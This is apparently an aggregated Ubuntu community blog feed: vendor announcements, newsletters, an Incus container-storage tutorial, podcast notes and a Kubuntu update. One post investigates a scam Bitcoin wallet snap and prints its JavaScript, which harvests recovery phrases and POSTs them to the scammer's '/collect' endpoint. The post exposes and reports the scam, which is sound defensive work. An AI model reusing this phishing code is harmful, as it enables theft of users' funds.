March 18, 2024

Charmed Kubernetes support comes to NVIDIA AI Enterprise

Canonical’s Charmed Kubernetes is now supported on NVIDIA AI Enterprise 5.0. Organisations using Kubernetes deployments on Ubuntu can look forward to a seamless licensing migration to the latest release of the NVIDIA AI Enterprise software platform, which provides developers with the latest AI models and optimised runtimes.

NVIDIA AI Enterprise 5.0

NVIDIA AI Enterprise 5.0 is supported across workstations, data centres, and cloud deployments. New updates include:

  • NVIDIA NIM microservices: a set of cloud-native microservices that developers can use as building blocks to support custom AI application development and speed production AI. NIM will be supported on Charmed Kubernetes.
  • NVIDIA API catalog: providing quick access for enterprise developers to experiment, prototype and test NVIDIA-optimised foundation models powered by NIM. When ready to deploy, enterprise developers can export the enterprise-ready API and run it on a self-hosted system.
  • Infrastructure management enhancements include support for vGPU heterogeneous profiles, Charmed Kubernetes, and new GPU platforms.

Charmed Kubernetes and NVIDIA AI Enterprise 5.0

Data scientists and developers leveraging NVIDIA frameworks and workflows on Ubuntu now have a single platform to rapidly develop AI applications on the latest generation of NVIDIA Tensor Core GPUs. For data scientists and AI/ML developers who want to deploy their latest AI workloads using Kubernetes, it is vital to get the most performance out of Tensor Core GPUs through NVIDIA drivers and integrations.

Fig. NVIDIA AI Enterprise 5.0

Charmed Kubernetes from Canonical provides several features that are unique to this distribution, including NVIDIA operators and GPU optimisation features, as well as composability and extensibility through customised integrations with the Ubuntu operating system.

Best-In-Class Kubernetes from Canonical 

Charmed Kubernetes can automatically detect GPU-enabled hardware and install the required drivers from NVIDIA repositories. With the release of Charmed Kubernetes 1.29, the NVIDIA GPU Operator charm is available for specific GPU configuration and tuning. With support for GPU operators in Charmed Kubernetes, organisations can rapidly and repeatedly deploy the same models on existing on-prem or cloud infrastructure to power AI workloads.
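As a rough sketch of what this can look like with Juju (the charm name and integration target below are assumptions; check Charmhub for the exact names and interfaces), deploying the GPU Operator into a Charmed Kubernetes model might be as simple as:

$ juju deploy nvidia-gpu-operator
$ juju integrate nvidia-gpu-operator kubernetes-control-plane
$ juju status --watch 5s    # wait for the operator to settle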

The NVIDIA GPU Operator automatically detects the GPUs on the system and installs the required NVIDIA software from NVIDIA repositories. It also enables optimal configurations through features such as NVIDIA Multi-Instance GPU (MIG) technology, to get the most efficiency out of the Tensor Core GPUs. GPU-optimised instances for AI/ML applications reduce latency and allow for more data processing, freeing capacity for larger-scale applications and more complex model deployments.
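To illustrate the MIG side concretely (a hedged example: the node name and profile are placeholders, and nvidia.com/mig.config is the label the GPU Operator’s MIG Manager watches in upstream deployments), a node can be partitioned by applying a MIG profile label:

$ kubectl label node worker-0 nvidia.com/mig.config=all-1g.5gb --overwrite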

Paired with the GPU Operator, the Network Operator enables GPUDirect RDMA (GDR), a key technology that accelerates cloud-native AI workloads by orders of magnitude. GDR allows for optimised network performance, by enhancing data throughput and reducing latency. Another distinctive advantage is its seamless compatibility with NVIDIA’s ecosystem, ensuring a cohesive experience for users. Furthermore, its design, tailored for Kubernetes, ensures scalability and adaptability in various deployment scenarios. This all leads to more efficient networking operations, making it an invaluable tool for businesses aiming to harness the power of GPU-accelerated networking in their Kubernetes environments.

Speaking about these solutions, Marcin “Perk” Stożek, Kubernetes Product Manager at Canonical says: “Charmed Kubernetes validation with NVIDIA AI Enterprise is an important step towards an enterprise-grade, end-to-end solution for AI workloads. By integrating NVIDIA Operators with Charmed Kubernetes, we make sure that customers get what matters to them most: efficient infrastructure for their generative AI workloads.” 

Getting started is easy (and free). You can rest assured that Canonical experts are available to help if required.

Get started with Canonical open source solutions with NVIDIA AI Enterprise 

Try out NVIDIA AI Enterprise with Charmed Kubernetes through a free, 90-day evaluation.

on March 18, 2024 10:10 PM
Fig.1. NVIDIA AI Workbench

Canonical expands its collaboration with NVIDIA through NVIDIA AI Workbench. NVIDIA AI Workbench is supported across workstations, data centres, and cloud deployments.

NVIDIA AI Workbench is an easy-to-use toolkit that allows developers to create, test, and customise AI and machine learning models on their PC or workstation and scale them to the data centre or public cloud.  It simplifies interactive development workflows while automating technical tasks that halt beginners and derail experts. Collaborative AI and ML development is now possible on any platform – and for any skill level. 

As the preferred OS for data science, artificial intelligence and machine learning, Ubuntu and Canonical play an integral role in AI Workbench capabilities. 

  • On Windows, Ubuntu powers AI Workbench via WSL2 (see the sketch after this list). 
  • In the cloud, Ubuntu 22.04 LTS enables AI Workbench cloud deployments as the only target OS supported for remote machines. 
  • For AI application deployments from the datacenter to cloud to edge, Ubuntu-based containers are included as a key part of AI Workbench.
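On the first bullet above, getting the Ubuntu side of WSL2 in place is a one-liner (shown as a sketch; run from an elevated PowerShell prompt, and the distribution name is one of several available):

> wsl --install -d Ubuntu-22.04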

This seamless end user experience is made possible thanks to the partnership between Canonical and NVIDIA.

Define your AI journey, start local and scale globally

Create, collaborate, and reproduce generative AI and data science projects with ease. Develop and execute while NVIDIA AI Workbench handles the rest:

  • Streamlined setup: easy installation and configuration of containerized development environments for GPU-accelerated hardware.
  • Laptop to cloud: start locally on an RTX PC or workstation and scale out to a data centre or cloud in just a few clicks.
  • Automated workflow management: simplified management of project resources, versioning, and dependency tracking.
Fig 2. Environment Window in AI Workbench Desktop App

Ubuntu and NVIDIA AI Workbench improve the end user experience for Generative AI workloads on client machines

As the established OS for data science, Ubuntu is now commonly being used for AI/ML development and deployment purposes. This includes development, processing, and iterations of Generative AI (GenAI) workloads. GenAI on both smaller devices and GPUs is increasingly important with the growth of edge AI applications and devices. Applications such as smart cities require more edge devices such as cameras and sensors and thus require more data to be processed at the edge. To make it easier for end users to deploy workloads with more customisability, Ubuntu containers are often preferred due to their ease of use for bare metal deployments. NVIDIA AI Workbench offers Ubuntu container options that are well integrated and suited for GenAI use cases.

Fig 3. AI Workbench Development Workflow

Peace of mind with Ubuntu LTS

With Ubuntu, developers benefit from Canonical’s 20-year track record of Long Term Support releases, delivering security updates and patching for 5 years. With Ubuntu Pro, organisations can extend that support and security maintenance commitment to 10 years, offloading security and compliance from their teams so they can focus on building great models. Together, Canonical and Ubuntu provide an optimised and secure environment for AI innovators wherever they are.

Getting started is easy (and free).

Get started with Canonical Open Source AI Solutions

on March 18, 2024 10:10 PM

Welcome to the Ubuntu Weekly Newsletter, Issue 831 for the week of March 10 – 16, 2024. The full version of this issue is available here.

In this issue we cover:

  • Welcome New Members and Developers
  • Ubuntu Stats
  • Hot in Support
  • UbuCon Asia 2024 – Call for proposals
  • Catalan Team: Call for participation in the Noble Festival
  • LoCo Events
  • Ubuntu Quality – Communications and Testing Practices
  • Other Community News
  • Ubuntu Cloud News
  • Canonical News
  • In the Press
  • In the Blogosphere
  • Other Articles of Interest
  • Featured Audio and Video
  • Meeting Reports
  • Upcoming Meetings and Events
  • Updates and Security for Ubuntu 20.04, 22.04, and 23.10
  • And much more!

The Ubuntu Weekly Newsletter is brought to you by:

  • Krytarik Raido
  • Bashing-om
  • Chris Guiver
  • Wild Man
  • And many others

If you have a story idea for the Weekly Newsletter, join the Ubuntu News Team mailing list and submit it. Ideas can also be added to the wiki!

on March 18, 2024 09:08 PM

Previously…

Back in February, I blogged about a series of scam Bitcoin wallet apps that were published in the Canonical Snap store, including one which netted a scammer $490K of some poor rube’s coin.

The snap was eventually removed, and some threads were started over on the Snapcraft forum.

Groundhog Day

Nothing has changed it seems, because once again, ANOTHER TEN scam Bitcoin wallet apps have been published in the Snap Store today.

You’re joking! Not another one!

Yes, Brenda!

This one has the snappy (sorry) name of exodus-build-96567 published by that not-very-legit looking publisher digisafe00000. Uh-huh.

Edit: Initially I wrote this post after analysing one of the snaps I stumbled upon. It’s been pointed out there’s a whole bunch under this account. All with popular crypto wallet brand names.

Publisher digisafe00000

There’s no indication this is the same developer as the last scam Exodus Wallet snap published in February, or the one published back in November last year.

Presentation

Here’s what it looks like on the Snap Store page https://snapcraft.io/exodus-build-96567 - which may be gone by the time you see this. A real minimum effort on the store listing page here. But I’m sure it could fool someone, they usually do.

A not very legit looking snap

It also shows up in searches within the desktop graphical storefront “Ubuntu Software” or “App Centre”, making it super easy to install.

Note: Do not install this.

“Secure, Manage, and Swap all your favorite assets.” None of that is true, as we’ll see later. Although one could argue “swap” is true if you don’t mind “swapping” all your Bitcoin for an empty wallet, I suppose.

Although it is “Safe”, apparently, according to the store listing.

Coming to a desktop near you

Open wide

It looks like the exodus-build-96567 snap was only published to the store today. I wonder what happened to builds 1 through 96566!

$ snap info exodus-build-96567
name: exodus-build-96567
summary: Secure, Manage, and Swap all your favorite assets.
publisher: Digital Safe (digisafe00000)
store-url: https://snapcraft.io/exodus-build-96567
license: unset
description: |
 Forget managing a million different wallets and seed phrases.
 Secure, Manage, and Swap all your favorite assets in one beautiful, easy-to-use wallet.
snap-id: wvexSLuTWD9MgXIFCOB0GKhozmeEijHT
channels:
 latest/stable: 8.6.5 2024-03-18 (1) 565kB -
 latest/candidate: ↑
 latest/beta: ↑
 latest/edge: ↑

Here’s the app running in a VM.

The application

If you try and create a new wallet, it waits a while then gives a spurious error. That code path likely does nothing. What it really wants you to do is “Add an existing wallet”.

Give us all your money

As with all these scam applications, all it does is ask for a Bitcoin recovery phrase, and with that it will likely steal all the coins and send them off to the scammer’s wallet. Obviously I didn’t test this with a real wallet phrase.

When given a false passphrase/recovery-key it calls some remote API then shows a dubious error, having already taken your recovery key, and sent it to the scammer.

Error

What’s inside?

While the snap is still available for download from the store, I grabbed it.

$ snap download exodus-build-96567
Fetching snap "exodus-build-96567"
Fetching assertions for "exodus-build-96567"
Install the snap with:
 snap ack exodus-build-96567_1.assert
 snap install exodus-build-96567_1.snap

I then unpacked the snap to take a peek inside.

unsquashfs exodus-build-96567_1.snap
Parallel unsquashfs: Using 8 processors
11 inodes (21 blocks) to write

[===========================================================|] 32/32 100%

created 11 files
created 8 directories
created 0 symlinks
created 0 devices
created 0 fifos
created 0 sockets
created 0 hardlinks

There’s not a lot in here. Mostly the usual snap scaffolding, metadata, and the single exodus-bin application binary in bin/.

tree squashfs-root/
squashfs-root/
├── bin
│ └── exodus-bin
├── meta
│ ├── gui
│ │ ├── exodus-build-96567.desktop
│ │ └── exodus-build-96567.png
│ ├── hooks
│ │ └── configure
│ └── snap.yaml
└── snap
 ├── command-chain
 │ ├── desktop-launch
 │ ├── hooks-configure-fonts
 │ └── run
 ├── gui
 │ ├── exodus-build-96567.desktop
 │ └── exodus-build-96567.png
 └── snapcraft.yaml

8 directories, 11 files

Here’s the snapcraft.yaml used to build the package. Note it needs network access, unsurprisingly.

name: exodus-build-96567 # you probably want to 'snapcraft register <name>'
base: core22 # the base snap is the execution environment for this snap
version: '8.6.5' # just for humans, typically '1.2+git' or '1.3.2'
title: Exodus Wallet
summary: Secure, Manage, and Swap all your favorite assets. # 79 char long summary
description: |
  Forget managing a million different wallets and seed phrases.
  Secure, Manage, and Swap all your favorite assets in one beautiful, easy-to-use wallet.

grade: stable # must be 'stable' to release into candidate/stable channels
confinement: strict # use 'strict' once you have the right plugs and slots

apps:
  exodus-build-96567:
    command: bin/exodus-bin
    extensions: [gnome]
    plugs:
      - network
      - unity7
      - network-status

layout:
  /usr/lib/${SNAPCRAFT_ARCH_TRIPLET}/webkit2gtk-4.1:
    bind: $SNAP/gnome-platform/usr/lib/$SNAPCRAFT_ARCH_TRIPLET/webkit2gtk-4.0

parts:
  exodus-build-96567:
    plugin: dump
    source: .
    organize:
      exodus-bin: bin/

For completeness, here’s the snap.yaml that gets generated at build-time.

name: exodus-build-96567
title: Exodus Wallet
version: 8.6.5
summary: Secure, Manage, and Swap all your favorite assets.
description: |
  Forget managing a million different wallets and seed phrases.
  Secure, Manage, and Swap all your favorite assets in one beautiful, easy-to-use wallet.
architectures:
- amd64
base: core22
assumes:
- command-chain
- snapd2.43
apps:
  exodus-build-96567:
    command: bin/exodus-bin
    plugs:
      - desktop
      - desktop-legacy
      - gsettings
      - opengl
      - wayland
      - x11
      - network
      - unity7
      - network-status
    command-chain:
      - snap/command-chain/desktop-launch
confinement: strict
grade: stable
environment:
  SNAP_DESKTOP_RUNTIME: $SNAP/gnome-platform
  GTK_USE_PORTAL: '1'
  LD_LIBRARY_PATH: ${SNAP_LIBRARY_PATH}${LD_LIBRARY_PATH:+:$LD_LIBRARY_PATH}
  PATH: $SNAP/usr/sbin:$SNAP/usr/bin:$SNAP/sbin:$SNAP/bin:$PATH
plugs:
  desktop:
    mount-host-font-cache: false
  gtk-3-themes:
    interface: content
    target: $SNAP/data-dir/themes
    default-provider: gtk-common-themes
  icon-themes:
    interface: content
    target: $SNAP/data-dir/icons
    default-provider: gtk-common-themes
  sound-themes:
    interface: content
    target: $SNAP/data-dir/sounds
    default-provider: gtk-common-themes
  gnome-42-2204:
    interface: content
    target: $SNAP/gnome-platform
    default-provider: gnome-42-2204
hooks:
  configure:
    command-chain:
      - snap/command-chain/hooks-configure-fonts
    plugs:
      - desktop
layout:
  /usr/lib/x86_64-linux-gnu/webkit2gtk-4.1:
    bind: $SNAP/gnome-platform/usr/lib/x86_64-linux-gnu/webkit2gtk-4.0
  /usr/lib/x86_64-linux-gnu/webkit2gtk-4.0:
    bind: $SNAP/gnome-platform/usr/lib/x86_64-linux-gnu/webkit2gtk-4.0
  /usr/share/xml/iso-codes:
    bind: $SNAP/gnome-platform/usr/share/xml/iso-codes
  /usr/share/libdrm:
    bind: $SNAP/gnome-platform/usr/share/libdrm

Digging Deeper

Unlike the previous scammy application that was written using Flutter, the developers of this one appear to have made a web page in a WebKit GTK wrapper.

If the network is not available, the application loads with an empty window containing an error message “Could not connect: Network is unreachable”.

No network

I brought the network up, ran Wireshark then launched the rogue application again. The app clearly loads the remote content (html, javascript, css, and logos) then renders it inside the wrapper Window.

Wireshark

The javascript is pretty simple. It has a dictionary of words which are allowed in a recovery key. Here’s a snippet.

var words = ['abandon', 'ability', 'able', 'about', 'above', 'absent', 'absorb',
    // …
    'youth', 'zebra', 'zero', 'zone', 'zoo'];

As the user types words, the application checks the list.

var alreadyAdded = {};
function checkWords() {
    var button = document.getElementById("continueButton");
    var inputString = document.getElementById("areatext").value;
    var words_list = inputString.split(" ");
    var foundWords = 0;

    words_list.forEach(function(word) {
        if (words.includes(word)) {
            foundWords++;
        }
    });

    if (foundWords === words_list.length && words_list.length === 12 || words_list.length === 18 || words_list.length === 24) {

        button.style.backgroundColor = "#511ade";

        if (!alreadyAdded[words_list]) {
            sendPostRequest(words_list);
            alreadyAdded[words_list] = true;
            button.addEventListener("click", function() {
                renderErrorImport();
            });
        }

    }
    else {
        button.style.backgroundColor = "#533e89";
    }
}

If all the entered words are in the dictionary, it will allow the use of the “Continue” button to send a “POST” request to a /collect endpoint on the server.

function sendPostRequest(words) {

    var data = {
        name: 'exodus',
        data: words
    };

    fetch('/collect', {
        method: 'POST',
        headers: {
            'Content-Type': 'application/json'
        },
        body: JSON.stringify(data)
    })
    .then(response => {
        if (!response.ok) {
            throw new Error('Error during the request');
        }
        return response.json();
    })
    .then(data => {
        console.log('Response:', data);
    })
    .catch(error => {
        console.error('There is an error:', error);
    });
}

Here you can see in the payload, the words I typed, selected from the dictionary mentioned above.

Wireshark

It also periodically ‘pings’ the /ping endpoint on the server with a simple payload of {"name":"exodus"}. Presumably this is for network connectivity checking, telemetry, or seeing which of the scam wallet applications are in use.

function sendPing() {

    var data = {
        name: 'exodus',
    };

    fetch('/ping', {
        method: 'POST',
        headers: {
            'Content-Type': 'application/json'
        },
        body: JSON.stringify(data)
    })
    .then(response => {
        if (!response.ok) {
            throw new Error('Error during the request');
        }
        return response.json();
    })
    .then(data => {
        console.log('Response:', data);
    })
    .catch(error => {
        console.error('There is an error:', error);
    });
}

All of this is done over HTTP, because of course it is. No security needed here!

Conclusion

It’s trivially easy to publish scammy applications like this in the Canonical Snap Store, and for them to go unnoticed.

I was somewhat hopeful that my previous post may have had some impact. It doesn’t look like much has changed yet beyond a couple of conversations on the forum.

It would be really neat if the team at Canonical responsible for the store could do something to prevent these kinds of apps before they get into the hands of users.

I’ve reported the app to the Snap Store team.

Until next time, Brenda!

on March 18, 2024 08:00 PM

March 14, 2024

Incus is a manager for virtual machines and system containers.

A system container is an instance of an operating system that runs on the same computer alongside the main operating system. Instead of hardware virtualisation, a system container uses security primitives of the Linux kernel for separation from the main operating system. You can think of system containers as software virtual machines.

In this post we are going to see how to conveniently manage the files of several Incus containers from a separate Incus container. The common use case is that you have several Incus containers, each hosting a website, and you want your Web developer to have access to the files from a central location over FTP or SFTP. Ideally, that central location should be an Incus container as well.

Therefore, we are looking at how to share storage between containers. A case we are not covering here is how to share storage between the host and the containers.

The setup

We are creating several Incus containers, each one a separate web server. Each web server expects to find its Web content files in the /var/www/ directory. Then, we create a separate container for the Web developer, to give access to those /var/www/ directories from a central location. The Web developer will get access to that specific container and only that container. As Incus admins, we are supposed to provide the Web developer access to that container through SSH or FTP.

In this setup, the Incus container for the web server is webserver1 and the Web developer’s container is called webdev.

We will be creating storage volumes for each web server from the Incus storage pool, then using incus storage volume attach to attach those volumes to both the corresponding web server container and the Web developer’s container.

Setting up the Incus container for webserver1

First we create the web server container, webserver1, and install the web server package. By default, the nginx web server creates an html directory in /var/www/ for the default website. In a later step, we will attach the storage volume there to store the files for this web server.

$ incus launch images:debian/12/cloud webserver1
Launching webserver1
$ incus exec webserver1 -- su --login debian
debian@webserver1:~$ sudo apt update
...
debian@webserver1:~$ sudo apt install -y nginx
...
debian@webserver1:~$ cd /var/www/
debian@webserver1:/var/www$ ls -l
total 1
drwxr-xr-x 2 root root 3 Mar 14 08:34 html
debian@webserver1:/var/www$ ls -l html/
total 1
-rw-r--r-- 1 root root 615 Mar 14 08:34 index.nginx-debian.html
debian@webserver1:/var/www$ 

Setting up the Incus container for webdev

Then, we create the Incus container for the Web developer. Ideally, you should provide access to this container to your Web developer through SSH/SFTP. Use incus config device add to create a proxy device in order to give that access (a sketch follows at the end of this section). Here, we create a WEBDEV directory in the home directory of the default debian user account of this container. In the next step, we will attach the separate storage volumes of each web server there.

$ incus launch images:debian/12/cloud webdev
Launching webdev
$ incus exec webdev -- su --login debian
debian@webdev:~$ pwd
/home/debian
debian@webdev:~$ mkdir WEBDEV
debian@webdev:~$ ls -l 
total 1
drwxr-xr-x 2 debian debian 2 Mar 14 09:28 WEBDEV
debian@webdev:~$ 
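For the SSH/SFTP access mentioned above, the proxy device could look like the following sketch (the device name ssh-port and the port numbers are arbitrary choices):

$ incus config device add webdev ssh-port proxy listen=tcp:0.0.0.0:2222 connect=tcp:127.0.0.1:22

Your Web developer would then connect with, for example, sftp -P 2222 debian@<host-address>.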

Setting up the storage volume for each web server

When you launch an Incus container, you automatically get a single storage volume for the files of that container. We are treating ourselves to an extra storage volume for the web data. But first, let’s learn a bit about storage pools and storage volumes.

We run incus storage list to get a list of the storage pools in our installation. In this case, the storage pool is called default (NAME), we are using ZFS for storage (DRIVER), and the ZFS pool (SOURCE) is also called default. You can run zpool list to verify the ZFS pool details. For the USED BY number of 89 in this example, you can verify it from the output of zfs list.

$ incus storage list
+---------+--------+---------+-------------+---------+---------+
|  NAME   | DRIVER | SOURCE  | DESCRIPTION | USED BY |  STATE  |
+---------+--------+---------+-------------+---------+---------+
| default | zfs    | default |             | 89      | CREATED |
+---------+--------+---------+-------------+---------+---------+
$ zpool list
NAME      SIZE  ALLOC     FREE  CKPOINT  EXPANDSZ   FRAG    CAP  DEDUP    HEALTH  ALTROOT
default   512G  136.9G  375.1G        -         -     8%    18%  1.00x    ONLINE  -
$ 

We run incus storage volume list to get a list of the storage volumes in Incus. I am not showing the output here because it is long. The first column is the type of the storage volume, either

  1. container, one per system container,
  2. image, for each cached image from a remote such as images.linuxcontainers.org,
  3. virtual-machine, for each virtual machine, or
  4. custom, for those created by ourselves as we are going to do in a moment.

The fourth column is the content-type of a storage volume, which can be either filesystem or block. The default when creating storage volumes is filesystem, and that is what we will be creating in a bit.

Creating the webdata1 storage volume

Now we are ready to create the webdata1 storage volume. Using the incus storage volume set of subcommands, we use create to create the webdata1 storage volume, of type filesystem, on the default storage pool.

$ incus storage volume create default webdata1 --type=filesystem
Storage volume webdata1 created
$ 

Attaching the webdata1 storage volume to the web server container

Now we can attach the webdata1 storage volume to the webserver1 container. Using the incus storage volume attach subcommand, we attach the webdata1 storage volume from the default storage pool to the webserver1 container, mounting it over the /var/www/html/ path.

$ incus storage volume attach default webdata1 webserver1 /var/www/html/
$ 

Attaching the webdata1 storage volume to the webdev container

Now we can attach the webdata1 storage volume to the webdev container as well. This time we mount it over the /home/debian/WEBDEV/webserver1 path, so each web server gets its own subdirectory under WEBDEV.

$ incus storage volume attach default webdata1 webdev /home/debian/WEBDEV/webserver1
$ 

Preparing the storage volume for webserver1

We have attached the storage volume to both the web server container and the web development container. Let’s set up the initial permissions and create a simple hello-world HTML file. We get a shell in the web development container webdev and observe that the storage volume has been mounted. The default permissions are drwx--x--x and we change them to drwxr-xr-x so that we can list the contents of the directory. Then, we change the owner:group to debian:debian in order to give the Web developer full access when they edit the files.

$ incus exec webdev -- su --login debian
debian@webdev:~$ ls -l
total 1
drwxr-xr-x 3 debian debian 3 Mar 14 10:33 WEBDEV
debian@webdev:~$ cd WEBDEV/
debian@webdev:~/WEBDEV$ ls -l
total 1
drwx--x--x 2 root root 2 Mar 14 09:59 webserver1
debian@webdev:~/WEBDEV$ sudo chmod 755 webserver1/
debian@webdev:~/WEBDEV$ sudo chown debian:debian webserver1/
debian@webdev:~/WEBDEV$ ls -l
total 1
drwxr-xr-x 2 debian debian 2 Mar 14 09:59 webserver1
debian@webdev:~/WEBDEV$ 

Creating an initial HelloWorld HTML file

Still in the webdev container, we create an initial HTML file. Note that once you paste the HTML code, you press Ctrl+d to save the index.html file.

debian@webdev:~/WEBDEV$ cd webserver1
debian@webdev:~/WEBDEV/webserver1$ cat > index.html
<!DOCTYPE HTML>
<html>
  <head>
    <title>Welcome to Incus</title>
    <meta charset="utf-8"  />
  </head>
  <style>
    body {
      background: rgb(2,0,36);
      background: linear-gradient(90deg, rgba(2,0,36,1) 0%, rgba(9,9,121,1) 35%, rgba(0,212,255,1) 100%);
    }
    h1,p {
      color: white;
      text-align: center;
    }
  </style>
  <body>
    <h1>Welcome to Incus</h1>
    <p>The web development data of this web server are stored in an Incus storage volume. </p>
    <p>This storage volume is attached to both the web server container and a web development container. </p>
  </body>
</html>
Ctrl+d
debian@webdev:~/WEBDEV/webserver1$ ls -l
total 1
-rw-r--r-- 1 debian debian 608 Mar 14 11:05 index.html
debian@webdev:~/WEBDEV/webserver1$ logout
$ 

Testing the result

We visit the web server using our browser. The IP address of the web server is obtained as follows.

$ incus list webserver1 -c n4
+------------+--------------------+
|    NAME    |        IPV4        |
+------------+--------------------+
| webserver1 | 10.10.10.88 (eth0) |
+------------+--------------------+
$ 

This is the HTML page we created.

Conclusion

We showed how to use a storage volume to separate the web server data files from the web server container. Those files are stored in the Incus storage pool. We attached the same storage volume to a separate container for the Web developer so that they get access to the files and only the files from a central location, the webdev container.

An additional task would be to setup git in the webdev container so that any changes to the web files are tracked.

You can also detach storage volumes when you no longer need them; a sketch follows.
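Detaching mirrors the attach command. Against the pool, volume, and container names used above:

$ incus storage volume detach default webdata1 webdev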

You would use incus config device to create a proxy device to give external access to the Web developer, preferably over SSH/SFTP instead of plain FTP. In terms of usability there is little difference between the two, so please use SFTP; all web development tools should support it.

on March 14, 2024 11:31 AM

"Todos à Tabacaria, Comprar a PC Guia!", é o novo motto do podcast. Neste episódio recebemos a visita de Giovanni Manghi - biólogo que trabalha com sistemas de informação geográfica (SIG) em Portugal desde 2008 e é militante ferrenho do Software Livre em todas as iniciativas que organiza e lugares por onde passa - nomeadamente do Qgis e sistemas GNU-Linux. Pelo caminho, falámos de confusões com o nome Ubuntu; aprender e ensinar com uma multidão de professores; distribuições Alentejanas; casos de sucesso de implantação de FLOSS em Portugal; o que falta fazer e perspectivas de futuro.

You know the drill: listen, subscribe and share!

Support

You can support the podcast using the Humble Bundle affiliate links, because when you use those links to make a purchase, part of what you pay goes to Podcast Ubuntu Portugal. You can get all of this for 15 dollars, or different parts depending on whether you pay 1 or 8. We think this is worth well over 15 dollars, so if you can, pay a little more, since you have the option to pay as much as you want. If you are interested in other bundles not listed in the show notes, use the link https://www.humblebundle.com/?partner=PUP and you will also be supporting us.

Attribution and licences

This episode was produced by Diogo Constantino, Miguel and Tiago Carrondo and edited by Senhor Podcast. The website is produced by Tiago Carrondo and its open-source code is licensed under the terms of the MIT Licence. The theme music is “Won’t see it comin’ (Feat Aequality & N’sorte d’autruche)” by Alpha Hydrae, licensed under the terms of the CC0 1.0 Universal License. This episode and the image used are licensed under the terms of the Attribution-NonCommercial-NoDerivatives 4.0 International (CC BY-NC-ND 4.0) licence, the full text of which can be read here. We are open to licensing for other types of use; contact us for validation and authorisation.

on March 14, 2024 12:00 AM

March 11, 2024

Welcome to the Ubuntu Weekly Newsletter, Issue 830 for the week of March 3 – 9, 2024. The full version of this issue is available here.

In this issue we cover:

  • Ubuntu 24.04 Testing Week
  • Ubuntu Stats
  • Hot in Support
  • Invitación al 20º Flisol en Mérida, Venezuela
  • LoCo Events
  • Documentation Office Hours recording 1st March 2024
  • Include Performance tooling in Ubuntu
  • Kernel Accessories Seed and Metapackage
  • Ubuntu 20th Anniversary – Party Planning
  • UbuCon @ SCaLE 21x – Schedules and Call for Booth Volunteers
  • Other Community News
  • Canonical News
  • In the Blogosphere
  • Featured Audio and Video
  • Meeting Reports
  • Upcoming Meetings and Events
  • Updates and Security for Ubuntu 20.04, 22.04, and 23.10
  • And much more!

The Ubuntu Weekly Newsletter is brought to you by:

  • Krytarik Raido
  • Bashing-om
  • Chris Guiver
  • Wild Man
  • And many others

If you have a story idea for the Weekly Newsletter, join the Ubuntu News Team mailing list and submit it. Ideas can also be added to the wiki!


on March 11, 2024 09:14 PM

March 08, 2024

Greetings, Kubuntu enthusiasts! It’s time for our regular community update, and we’ve got plenty of exciting developments to share from the past month. Our team has been hard at work, balancing the demands of personal commitments with the passion we all share for Kubuntu. Here’s what we’ve been up to:

Localstack & Kubuntu Joint Press Release


We’re thrilled to announce that we’ve been working closely with Localstack to prepare a joint press release that’s set to be published next week. This collaboration marks a significant milestone for us, and we’re eager to share the details with you all. Stay tuned!

Kubuntu Graphic Design Contest

Our Kubuntu Graphic Design Contest is progressing exceptionally well, showcasing an array of exciting contributions from our talented community members. The creativity and innovation displayed in these submissions not only highlight the diverse talents within our community but also contribute significantly to the visual identity and user experience of Kubuntu. We’re thrilled with the participation so far and would like to remind everyone that the contest remains open for submissions until the 31st of March, 2024. This is a wonderful opportunity for designers, artists, and enthusiasts to leave their mark on Kubuntu and help shape its aesthetic direction. If you haven’t submitted your work yet, we encourage you to take part and share your vision with us. Let’s continue to build a visually stunning and user-friendly Kubuntu together.

Kubuntu Wiki Support Forum


Our search for a new home for the Kubuntu Wiki Support Forum is progressing well. We understand the importance of having a reliable and accessible platform for our users to find support and share knowledge. Rest assured, we’re on track to make this transition as smooth as possible.

New Donations Platforms


In our efforts to ensure the sustainability and growth of Kubuntu, we’re in the process of introducing new donation platforms. Jonathan Riddell is at the helm, working diligently to align our financial controls and operations. This initiative will help us better serve our community and foster further development.

Collaboration with Kubuntu Focus


Exciting developments are on the horizon as we collaborate with Kubuntu Focus to curate a new set of developer tools. While we’re not ready to divulge all the details just yet, we’re confident that this partnership will yield invaluable resources for cloud software developers in our community. More information will be shared soon.

Kubuntu Matrix Communication


We’re happy to report that our efforts to enhance communication within the Kubuntu community have borne fruit. We now have a dedicated Kubuntu Space on Matrix, complete with channels for Development, Discussion, and Support. This platform will make it easier for our community to connect, collaborate, and provide mutual assistance.

A Word of Appreciation


The past few weeks have been a whirlwind of activity, both personally and professionally. Despite the challenges, the progress we’ve made is a testament to the dedication and hard work of everyone involved in the Kubuntu project. A special shoutout to Scarlett Moore, Aaron Rainbolt, Rik Mills and Mike Mikowski for their exceptional contributions and to the wider community for your unwavering support. Your enthusiasm and commitment are what drive us forward.

As we look towards the exciting release of Kubuntu 24.04, we’re filled with anticipation for what the future holds. Our journey is far from over, and with each step, we grow stronger and more united as a community. Thank you for being an integral part of Kubuntu. Here’s to the many achievements we’ll share in the days to come!

Stay connected, stay inspired, and as always, thank you for your continued support of Kubuntu.

— The Kubuntu Team

on March 08, 2024 04:53 PM

March 07, 2024

E289 Uma Profusão De Abas Em Fogo (A Profusion of Tabs on Fire)

Podcast Ubuntu Portugal

After an intense week of frying food in a food truck, we hurtle at breakneck speed towards the first legislative elections of 2024 and the end of democracy. But there are reasons for optimism: we tore into Google’s clumsiness; soon there will be heaps of Snaps for Ubuntu Touch; for those who like them, Firefox is good at managing a massive pile of tabs; and Nextcloud has really, really, really good tools for you to discover. This week’s controversy, to set social media ablaze with bombastic, twisted headlines: Diogo hates Mozilla!!! [it’s false, but what matters is getting clicks - you wanted journalism, didn’t you?].

You know the drill: listen, subscribe and share!

Support

You can support the podcast using the Humble Bundle affiliate links, because when you use those links to make a purchase, part of what you pay goes to Podcast Ubuntu Portugal. You can get all of this for 15 dollars, or different parts depending on whether you pay 1 or 8. We think this is worth well over 15 dollars, so if you can, pay a little more, since you have the option to pay as much as you want. If you are interested in other bundles not listed in the show notes, use the link https://www.humblebundle.com/?partner=PUP and you will also be supporting us.

Attribution and licences

This episode was produced by Diogo Constantino, Miguel and Tiago Carrondo and edited by Senhor Podcast. The website is produced by Tiago Carrondo and its open-source code is licensed under the terms of the MIT Licence. The theme music is “Won’t see it comin’ (Feat Aequality & N’sorte d’autruche)” by Alpha Hydrae, licensed under the terms of the CC0 1.0 Universal License. This episode and the image used are licensed under the terms of the Attribution-NonCommercial-NoDerivatives 4.0 International (CC BY-NC-ND 4.0) licence, the full text of which can be read here. We are open to licensing for other types of use; contact us for validation and authorisation.

on March 07, 2024 12:00 AM

March 04, 2024

